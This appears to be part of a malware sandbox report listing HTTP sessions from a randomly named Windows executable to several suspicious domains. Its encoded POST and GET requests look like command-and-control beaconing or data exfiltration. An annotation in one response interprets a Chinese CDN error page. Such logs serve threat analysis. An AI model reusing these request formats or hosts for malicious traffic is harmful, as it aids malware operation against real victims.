                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 225
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 41 67 6d 39 54 37 44 4b 4d 41 32 38 4d 48 35 74 36 6f 6b 69 73 6f 44 39 6e 4e 7a 43 50 72 67 75 74 32 6c 78 59 2f 32 62 35 63 71 75 6c 6a 48 64 30 4a 36 6e 43 4d 51 65 75 59 70 5a 4b 59 31 79 37 4c 46 55 78 77 50 54 51 66 51 48 6d 62 67 4c 6a 36 6a 64 2b 35 78 79 58 67 42 32 56 55 32 6d 54 59 50 66 73 6e 32 2b 4f 48 62 47 4e 64 59 62 65 59 53 41 42 56 74 6e 54 69 58 32 2b 42 54 5a 61 4e 75 74 39 71 69 74 35 4a 77 58 74 73 6c 6f 73 70 48 4f 65 51 4a 4c 75 6b 48 6c 42 32 30 43 4f 4b 4a 32 48 33 4e 52 4b 6c 6a 64 42 43 42 79 52 78 59 62 35 6a 6b 51 6b 41 47 36 62 4c 49 6f 51 2b 46 62 42 6f 4b 48 30 65 32 30 6b 57 30 77 4f 65 6d 61 56 2f 45 3d
                  Data Ascii: n02X2xPX=Agm9T7DKMA28MH5t6okisoD9nNzCPrgut2lxY/2b5cquljHd0J6nCMQeuYpZKY1y7LFUxwPTQfQHmbgLj6jd+5xyXgB2VU2mTYPfsn2+OHbGNdYbeYSABVtnTiX2+BTZaNut9qit5JwXtslospHOeQJLukHlB20COKJ2H3NRKljdBCByRxYb5jkQkAG6bLIoQ+FbBoKH0e20kW0wOemaV/E=


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  3 | 192.168.2.4 | 49739 | 116.213.43.190 | 80 | 2844 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:10:42.347687006 CEST | 10855 | OUT | POST /kfqo/ HTTP/1.1
                  Host: www.binpvae.lol
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.binpvae.lol
                  Referer: http://www.binpvae.lol/kfqo/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 10305
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 41 67 6d 39 54 37 44 4b 4d 41 32 38 4d 48 35 74 36 6f 6b 69 73 6f 44 39 6e 4e 7a 43 50 72 67 75 74 32 6c 78 59 2f 32 62 35 63 69 75 6c 51 50 64 31 71 69 6e 59 4d 51 65 6b 34 70 61 4b 59 31 76 37 4c 63 66 78 77 44 44 51 5a 63 48 67 4f 30 4c 68 49 62 64 30 35 78 79 65 41 42 33 52 55 32 33 54 59 65 58 73 6e 6d 2b 4f 48 62 47 4e 65 41 62 4e 73 2b 41 48 56 74 6b 55 69 58 4d 70 78 54 31 61 4a 37 57 39 71 6d 39 36 35 51 58 74 4e 5a 6f 6a 37 2f 4f 63 77 4a 65 74 6b 48 48 42 32 34 6a 4f 4b 56 4d 48 33 34 30 4b 6c 58 64 43 47 67 6c 4a 30 34 62 6a 67 41 31 35 52 53 45 58 4c 45 64 49 70 31 66 52 74 65 4f 75 36 36 70 2b 32 70 33 5a 74 6e 65 58 70 2f 6f 46 47 77 76 38 4b 62 32 6c 42 5a 66 49 73 6a 49 78 55 43 42 44 79 2f 47 4e 36 35 41 4f 61 72 46 45 55 2f 79 54 44 4c 2f 58 52 72 39 30 71 34 39 4d 4f 74 52 4b 55 66 55 48 30 54 61 56 62 5a 50 46 4f 77 70 6c 49 72 7a 43 41 63 49 77 31 44 54 6d 68 74 65 53 68 76 61 5a 72 2f 36 78 34 62 35 52 72 5a 6c 33 56 77 42 76 74 39 45 76 63 63 57 39 [TRUNCATED]
                  Data Ascii: n02X2xPX=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 [TRUNCATED]


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  4 | 192.168.2.4 | 49740 | 116.213.43.190 | 80 | 2844 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:10:44.897965908 CEST | 496 | OUT | GET /kfqo/?n02X2xPX=NiOdQOuMLD2zHgMWwKws4JzuutDmLpx3tWxYTf2s7ZGupi3Uz5m5Dts89dE7D44P7JMDqAvEJ+8u+Llyo4b9pPx+fjdmUm+qFImntH+EZRPwIZM2dcS4AHM=&XHUPe=Ud3TZHA0-F74ZZ HTTP/1.1
                  Host: www.binpvae.lol
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  5 | 192.168.2.4 | 49742 | 207.148.37.252 | 80 | 2844 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:11:28.369642973 CEST | 750 | OUT | POST /1kbe/ HTTP/1.1
                  Host: www.a9jcpf.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.a9jcpf.top
                  Referer: http://www.a9jcpf.top/1kbe/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 205
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 67 62 34 2f 56 4d 6b 59 78 2b 52 65 52 64 78 79 35 47 76 75 32 66 33 6d 59 59 4c 4f 38 67 74 42 6f 5a 4d 71 2b 6e 35 42 4d 73 30 31 6b 68 56 2f 6e 6c 30 45 5a 67 59 55 73 78 6c 6b 78 6e 34 76 53 69 76 64 58 67 78 77 69 49 43 57 76 54 4f 4f 73 67 62 51 6e 36 43 4f 70 63 69 43 75 33 6e 52 78 4a 30 34 36 61 73 4d 51 45 31 6e 68 78 6a 35 49 4f 68 7a 2f 6f 43 4e 44 34 6c 6f 6a 4f 66 63 2b 34 38 34 36 30 4c 78 30 62 4d 44 6b 49 6b 47 76 58 38 6b 75 33 5a 67 75 4f 35 7a 4a 73 59 46 7a 50 56 46 56 65 6f 50 36 58 4c 6a 4a 6a 49 61 4f 32 71 76 43 50 62 30 35 66 39 32 50 34 35 4a 57 77 3d 3d
                  Data Ascii: n02X2xPX=gb4/VMkYx+ReRdxy5Gvu2f3mYYLO8gtBoZMq+n5BMs01khV/nl0EZgYUsxlkxn4vSivdXgxwiICWvTOOsgbQn6COpciCu3nRxJ046asMQE1nhxj5IOhz/oCND4lojOfc+48460Lx0bMDkIkGvX8ku3ZguO5zJsYFzPVFVeoP6XLjJjIaO2qvCPb05f92P45JWw==
                  Jul 4, 2024 03:11:29.378324986 CEST | 209 | IN | HTTP/1.1 530
                  Date: Thu, 04 Jul 2024 01:11:29 GMT
                  Content-Type: text/html;charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Server: cdn
                  Data Raw: 32 64 0d 0a e2 9e a1 ef b8 8f e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e7 9a 84 e8 8a 82 e7 82 b9 ef bc 9a 32 30 37 2e 31 34 38 2e 33 37 2e 32 35 32 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 2d207.148.37.252 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  6 | 192.168.2.4 | 49743 | 207.148.37.252 | 80 | 2844 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:11:30.935622931 CEST | 770 | OUT | POST /1kbe/ HTTP/1.1
                  Host: www.a9jcpf.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.a9jcpf.top
                  Referer: http://www.a9jcpf.top/1kbe/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 225
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 67 62 34 2f 56 4d 6b 59 78 2b 52 65 51 35 31 79 2f 6e 76 75 7a 2f 33 6e 53 34 4c 4f 32 41 74 2f 6f 5a 49 71 2b 6c 55 5a 4d 35 6b 31 6b 42 46 2f 6d 6e 63 45 61 67 59 55 34 68 6c 6c 75 33 35 43 53 69 6a 6a 58 6c 52 77 69 49 2b 57 76 53 2b 4f 73 7a 7a 50 6d 71 43 4d 79 73 69 41 6a 58 6e 52 78 4a 30 34 36 62 4a 5a 51 41 68 6e 69 45 72 35 4c 76 68 77 38 6f 43 4b 54 6f 6c 6f 79 65 66 51 2b 34 38 65 36 77 72 49 30 5a 30 44 6b 4e 59 47 76 47 38 6c 33 48 5a 69 71 4f 34 7a 49 5a 46 4a 38 74 41 47 62 39 73 58 7a 30 6d 65 42 46 5a 41 66 48 4c 34 51 50 2f 48 6b 59 30 43 43 37 45 41 4e 38 4b 63 42 57 54 61 2f 35 46 55 4c 52 4b 4f 55 6f 4a 41 33 67 63 3d
                  Data Ascii: n02X2xPX=gb4/VMkYx+ReQ51y/nvuz/3nS4LO2At/oZIq+lUZM5k1kBF/mncEagYU4hllu35CSijjXlRwiI+WvS+OszzPmqCMysiAjXnRxJ046bJZQAhniEr5Lvhw8oCKToloyefQ+48e6wrI0Z0DkNYGvG8l3HZiqO4zIZFJ8tAGb9sXz0meBFZAfHL4QP/HkY0CC7EAN8KcBWTa/5FULRKOUoJA3gc=
                  Jul 4, 2024 03:11:31.832192898 CEST | 209 | IN | HTTP/1.1 530
                  Date: Thu, 04 Jul 2024 01:11:31 GMT
                  Content-Type: text/html;charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Server: cdn
                  Data Raw: 32 64 0d 0a e2 9e a1 ef b8 8f e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e7 9a 84 e8 8a 82 e7 82 b9 ef bc 9a 32 30 37 2e 31 34 38 2e 33 37 2e 32 35 32 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 2d207.148.37.252 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  7 | 192.168.2.4 | 49744 | 207.148.37.252 | 80 | 2844 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:11:33.477741003 CEST | 10852 | OUT | POST /1kbe/ HTTP/1.1
                  Host: www.a9jcpf.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.a9jcpf.top
                  Referer: http://www.a9jcpf.top/1kbe/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 10305
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 67 62 34 2f 56 4d 6b 59 78 2b 52 65 51 35 31 79 2f 6e 76 75 7a 2f 33 6e 53 34 4c 4f 32 41 74 2f 6f 5a 49 71 2b 6c 55 5a 4d 35 73 31 6b 7a 39 2f 67 47 63 45 62 67 59 55 6b 52 6c 65 75 33 34 41 53 69 37 2f 58 6c 56 4b 69 4f 79 57 75 30 4b 4f 39 53 7a 50 76 71 43 4d 74 63 69 42 75 33 6d 4d 78 4a 45 30 36 61 35 5a 51 41 68 6e 69 46 62 35 66 75 68 77 36 6f 43 4e 44 34 6c 30 6a 4f 66 30 2b 34 56 6c 36 77 76 48 7a 70 55 44 6b 74 6f 47 69 51 51 6c 6f 33 5a 73 6e 75 34 64 49 5a 41 4c 38 74 63 73 62 2b 77 74 7a 33 36 65 45 67 46 64 63 6b 6e 79 46 35 79 63 34 35 6f 38 5a 4d 55 31 55 4c 4f 59 43 54 62 7a 70 59 38 35 47 77 37 59 43 71 6c 47 6b 47 76 72 49 74 52 48 39 72 55 4c 74 78 74 70 65 4d 53 47 7a 39 72 45 54 76 2b 73 32 67 69 45 54 35 42 50 54 30 62 46 53 72 51 39 6d 38 65 7a 77 43 63 79 79 58 2b 71 76 63 57 47 6a 30 6d 49 6c 46 74 76 33 2b 78 66 6e 78 2f 4e 6d 50 30 36 6b 56 2f 35 32 51 47 30 4d 66 67 67 6e 68 7a 30 2b 4e 51 30 7a 5a 30 67 5a 69 48 34 76 56 4d 4b 5a 6e 62 4a 65 [TRUNCATED]
                  Data Ascii: n02X2xPX=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 [TRUNCATED]
                  Jul 4, 2024 03:11:34.369812965 CEST | 209 | IN | HTTP/1.1 530
                  Date: Thu, 04 Jul 2024 01:11:34 GMT
                  Content-Type: text/html;charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Server: cdn
                  Data Raw: 32 64 0d 0a e2 9e a1 ef b8 8f e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e7 9a 84 e8 8a 82 e7 82 b9 ef bc 9a 32 30 37 2e 31 34 38 2e 33 37 2e 32 35 32 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 2d207.148.37.252 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  8 | 192.168.2.4 | 49745 | 207.148.37.252 | 80 | 2844 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:11:36.007993937 CEST | 495 | OUT | GET /1kbe/?XHUPe=Ud3TZHA0-F74ZZ&n02X2xPX=tZQfW8UiiNJTf5Fq5WrX9vmmZrioxCoVqMwq5i80b8QJkwpSgFAdETlO4QFSoDRfTxjpMxprnPemrx/P1Sfw5KD2hu+ipHyltaJOhZhwSC5dlgXXfIxM6PM= HTTP/1.1
                  Host: www.a9jcpf.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Jul 4, 2024 03:11:36.905635118 CEST | 209 | IN | HTTP/1.1 530
                  Date: Thu, 04 Jul 2024 01:11:36 GMT
                  Content-Type: text/html;charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Server: cdn
                  Data Raw: 32 64 0d 0a e2 9e a1 ef b8 8f e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e7 9a 84 e8 8a 82 e7 82 b9 ef bc 9a 32 30 37 2e 31 34 38 2e 33 37 2e 32 35 32 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 2d207.148.37.252 0  (chunked body: one 0x2d-byte chunk followed by the terminating zero-length chunk; the renderer dropped the UTF-8 text "➡️当前访问的节点：" that precedes the address, Chinese for "Current node being accessed:", so this is the CDN edge node's own error text rather than a C2 reply)


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  9 | 192.168.2.4 | 49746 | 116.213.43.190 | 80 | 2844 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:11:42.301664114 CEST | 753 | OUT | POST /il19/ HTTP/1.1
                  Host: www.mhtnvro.lol
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.mhtnvro.lol
                  Referer: http://www.mhtnvro.lol/il19/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 205
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 37 55 63 6f 6b 71 32 45 76 59 32 71 77 68 38 5a 37 46 54 79 43 58 4d 4f 6e 56 7a 4c 6d 63 67 6a 2b 5a 43 69 72 33 6e 48 66 6c 54 6c 50 47 74 34 64 68 67 57 71 5a 42 64 35 34 79 6a 36 52 4f 68 2f 59 58 38 44 46 45 39 62 52 64 50 4e 32 50 77 79 35 6b 55 74 4b 6a 34 2f 71 53 47 7a 70 48 6f 64 42 36 76 71 75 4f 59 4e 49 4e 73 6b 64 48 44 5a 52 32 6b 71 4b 62 49 44 44 56 44 4b 36 67 73 63 77 55 64 61 62 53 6a 53 7a 4c 4a 4e 59 38 4a 65 55 56 65 76 50 4a 30 75 75 77 72 61 49 7a 44 6d 34 4a 68 36 39 4d 79 69 61 55 63 77 75 73 34 77 53 72 38 47 2b 39 32 38 54 33 6d 78 44 78 30 2f 51 3d 3d
                  Data Ascii: n02X2xPX=7Ucokq2EvY2qwh8Z7FTyCXMOnVzLmcgj+ZCir3nHflTlPGt4dhgWqZBd54yj6ROh/YX8DFE9bRdPN2Pwy5kUtKj4/qSGzpHodB6vquOYNINskdHDZR2kqKbIDDVDK6gscwUdabSjSzLJNY8JeUVevPJ0uuwraIzDm4Jh69MyiaUcwus4wSr8G+928T3mxDx0/Q==


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  10 | 192.168.2.4 | 49747 | 116.213.43.190 | 80 | 2844 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:11:44.836771965 CEST | 773 | OUT | POST /il19/ HTTP/1.1
                  Host: www.mhtnvro.lol
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.mhtnvro.lol
                  Referer: http://www.mhtnvro.lol/il19/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 225
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 37 55 63 6f 6b 71 32 45 76 59 32 71 32 79 55 5a 39 69 50 79 44 33 4d 42 37 6c 7a 4c 2f 4d 67 6e 2b 5a 65 69 72 7a 58 58 66 77 6a 6c 50 6a 4a 34 50 6a 49 57 72 5a 42 64 32 59 79 36 31 78 50 74 2f 59 62 61 44 48 41 39 62 51 35 50 4e 7a 7a 77 31 49 6b 58 72 4b 6a 36 6e 61 53 45 33 70 48 6f 64 42 36 76 71 74 79 32 4e 49 56 73 6b 75 66 44 4c 6a 53 72 78 71 62 4c 4b 6a 56 44 41 71 67 6f 63 77 55 2f 61 61 4f 46 53 32 50 4a 4e 59 73 4a 65 47 74 42 32 2f 4a 32 71 75 78 64 53 70 65 4a 2f 74 39 71 39 39 4d 4b 6c 61 73 74 78 6f 39 69 68 6a 4b 72 55 2b 5a 46 68 55 2b 53 38 41 4d 39 6b 65 38 35 31 4b 6a 46 68 4d 39 76 37 78 6f 50 65 77 6a 55 54 6f 41 3d
                  Data Ascii: n02X2xPX=7Ucokq2EvY2q2yUZ9iPyD3MB7lzL/Mgn+ZeirzXXfwjlPjJ4PjIWrZBd2Yy61xPt/YbaDHA9bQ5PNzzw1IkXrKj6naSE3pHodB6vqty2NIVskufDLjSrxqbLKjVDAqgocwU/aaOFS2PJNYsJeGtB2/J2quxdSpeJ/t9q99MKlastxo9ihjKrU+ZFhU+S8AM9ke851KjFhM9v7xoPewjUToA=


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  11 | 192.168.2.4 | 49748 | 116.213.43.190 | 80 | 2844 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:11:47.385162115 CEST | 10855 | OUT | POST /il19/ HTTP/1.1
                  Host: www.mhtnvro.lol
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.mhtnvro.lol
                  Referer: http://www.mhtnvro.lol/il19/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 10305
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 37 55 63 6f 6b 71 32 45 76 59 32 71 32 79 55 5a 39 69 50 79 44 33 4d 42 37 6c 7a 4c 2f 4d 67 6e 2b 5a 65 69 72 7a 58 58 66 78 33 6c 50 31 56 34 4d 45 55 57 36 70 42 64 2f 34 79 2f 31 78 4f 33 2f 59 7a 47 44 48 4d 4c 62 54 52 50 43 78 4c 77 77 39 45 58 34 71 6a 36 37 71 53 48 7a 70 48 48 64 42 72 6d 71 75 4b 32 4e 49 56 73 6b 6f 62 44 4a 78 32 72 32 61 62 49 44 44 55 52 4b 36 67 41 63 78 78 43 61 62 36 7a 54 46 33 4a 4e 35 63 4a 63 31 56 42 2f 2f 4a 6f 6e 4f 78 56 53 70 53 4b 2f 72 59 54 39 2b 51 73 6c 5a 77 74 7a 4d 70 35 37 51 4f 44 4b 50 78 61 33 6e 4b 4e 39 78 6b 4c 6c 59 63 63 31 49 76 72 35 50 42 66 2b 7a 67 47 49 78 76 6e 51 2f 47 45 7a 63 33 46 35 55 4c 49 4e 57 63 45 50 32 76 66 75 2b 72 66 33 78 6b 32 72 45 52 42 61 6e 77 55 49 4f 30 79 57 77 35 35 66 6a 4c 4f 4f 71 75 66 5a 73 49 50 35 62 6c 35 34 31 35 76 61 6d 6f 56 37 75 76 4a 61 52 65 77 7a 32 48 45 72 6d 34 56 33 69 32 69 6a 38 2b 4e 4e 6b 4a 73 62 42 43 4d 4d 61 4f 6b 62 57 4e 32 45 72 48 50 57 31 73 66 73 [TRUNCATED]
                  Data Ascii: n02X2xPX=7Ucokq2EvY2q2yUZ9iPyD3MB7lzL/Mgn+ZeirzXXfx3lP1V4MEUW6pBd/4y/1xO3/YzGDHMLbTRPCxLww9EX4qj67qSHzpHHdBrmquK2NIVskobDJx2r2abIDDURK6gAcxxCab6zTF3JN5cJc1VB//JonOxVSpSK/rYT9+QslZwtzMp57QODKPxa3nKN9xkLlYcc1Ivr5PBf+zgGIxvnQ/GEzc3F5ULINWcEP2vfu+rf3xk2rERBanwUIO0yWw55fjLOOqufZsIP5bl5415vamoV7uvJaRewz2HErm4V3i2ij8+NNkJsbBCMMaOkbWN2ErHPW1sfsWNEeF0xFgCKL3O5aiETWTeAZRqYs3tCFn2ToJxbiN/3cANMrpQL91gBkkXNv+gLJaSsLut/xdZ3CjcfF/mmD/VZvzh4JcNxbRoapoERLRHG3CXuirGqLRaJeYIQ09TOufDH0ArqOHHZiSl9hlhvfVeXFZijKKgCWpvq559F3gE6zXRY2ERIrmE+za+wn9hUsA9R9js+Xrvf4RSveEGUdqQmf9hORq/q3G/R4BcMOqQ0UiKz9nbKz7QEIQjh035eZ/R7fB1PiswO6TjDZ22xW8I/uR2nFB96Qf/FdpN4d4Gr2LLLnpVZwwY3tIriqj8J+RTWjUgsl4u9/BFwVY0nrzAN/9D/ZxeIytPdEyi7f8SxIAePn7aZoDiydcf/eADxFmB7L8++OoBm1JZsG4JbHPXgLEizkQgVSqP+wHAQcLtdEbHAxqvztt7m7nZzvV0qOxe5VsAJwnQtfWRGoiMGx0SpKk/2HVtqavmVww9TZgu0hFpYW3wg1bXAx+WuIdOUbdbkSTFIXHv3eYDwG6gXw7mLV+O5sX7EhkV2XTiMQ5UfzQtX/Gaz59bxo63stSMrF+XpojWiU9t8POrlFl0Ivk4GVTKMJ0ZLgFtxqdrLkrEm+qaMGrhx+m8SpJgmEwD17y9ihN4WemtApjQwMmMpHm/KBqK+sih+qUJ [TRUNCATED]


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  12 | 192.168.2.4 | 49749 | 116.213.43.190 | 80 | 2844 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:11:49.918725014 CEST | 496 | OUT | GET /il19/?n02X2xPX=2W0Inf+zka60rkge6x3gGQQeo1iuz6hi+bPXuzv4I1vHSGtqZzoorLZZnoCmwyX2i4rMR0gWWwZYBzao7rAttPu5367SyozTICrQ88OWOZt9joXCP1iWm4I=&XHUPe=Ud3TZHA0-F74ZZ HTTP/1.1
                  Host: www.mhtnvro.lol
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  13 | 192.168.2.4 | 49750 | 203.161.55.102 | 80 | 2844 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:12:16.585943937 CEST | 756 | OUT | POST /ff8d/ HTTP/1.1
                  Host: www.lexiecos.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.lexiecos.top
                  Referer: http://www.lexiecos.top/ff8d/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 205
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 6c 6a 68 6a 33 47 72 6c 73 34 51 6b 6e 6e 52 71 62 57 77 5a 47 70 49 69 39 79 44 51 6c 57 62 56 45 2b 33 4f 7a 44 67 74 44 63 57 72 77 4a 36 47 50 79 63 5a 62 62 41 4d 48 7a 67 6d 47 65 67 77 6c 53 44 47 2f 6d 7a 55 52 70 74 68 6f 64 41 59 66 56 6d 45 4a 59 50 30 38 33 57 57 70 70 78 71 67 32 32 6b 45 57 49 38 2f 73 4c 52 7a 71 4d 2b 6a 42 79 4b 7a 5a 35 76 68 62 49 32 66 7a 39 45 39 4a 57 41 33 49 4f 38 4a 44 37 4f 72 77 37 2b 4e 45 6c 38 52 7a 61 74 2f 78 77 76 68 75 73 49 6c 69 7a 44 31 2f 6f 77 52 35 56 6d 75 70 79 52 72 69 71 32 4a 6c 6e 41 6f 6b 38 51 65 63 79 4d 6e 77 3d 3d
